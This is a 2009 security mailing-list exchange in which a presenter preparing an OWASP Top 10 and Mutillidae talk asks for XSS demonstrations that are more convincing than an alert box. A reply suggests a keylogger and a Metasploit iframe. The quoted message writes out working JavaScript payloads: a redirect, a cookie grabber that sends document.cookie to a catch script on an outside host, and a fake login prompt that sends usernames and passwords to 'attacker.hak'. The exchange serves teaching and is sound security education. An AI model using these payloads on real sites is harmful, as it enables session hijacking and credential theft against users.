You could inject a JavaScript keylogger, which can be seen here in the middler:
http://code.google.com/p/middler/source/browse/trunk/middlerlib/plugins/plugin-keylogger-INGUARDIANS-ONLY.py

Also, a Metasploit iframe, which can be seen in the next file in the plugins
directory. Cookie grabbing can be very interesting. Take for example a full
SSL site with proper SSL-only cookies, but the site has an XSS vulnerability.
Grab the cookie, put it in your browser, and you could potentially have a
session hijack, even though the site has full, properly implemented SSL, all
from a little XSS hole.

On Thu, May 28, 2009 at 11:50 AM, Adrian Crenshaw <[email protected]> wrote:

> Ok, I've got yet another presentation coming up, this time on the OWASP Top
> 10 and Mutillidae. One of the things I'm going to cover is XSS. The
> canonical example of course is:
>
> <script>alert("XSS");</script>
>
> but that is boring, and gives folks the impression that XSS is not that
> serious.  Better short examples would be:
>
> *Redirect traffic to your site:*
> <script>window.location = "http://www.irongeek.com/";</script>
>
> *A little cookie Grabbing:*
> <script>
> new Image().src="http://some-ip/mutillidae/catch.php?cookie="+encodeURI(document.cookie);
> </script>
>
> *Or maybe a password form to make people think they have to login, but it
> just grabs the credentials:*
> <script>
> username=prompt('Please enter your username',' ');
> password=prompt('Please enter your password',' ');
> document.write("<img src=\"http://attacker.hak/catch.php?username="+username+"&password="+password+"\">");
> </script>
>
> What are other cool things to inject, besides maybe BeEF, that show off how
> XSS can be a big deal?
>
> Thanks,
> Adrian
>
>
> _______________________________________________
> Pauldotcom mailing list
> [email protected]
> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> Main Web Site: http://pauldotcom.com
>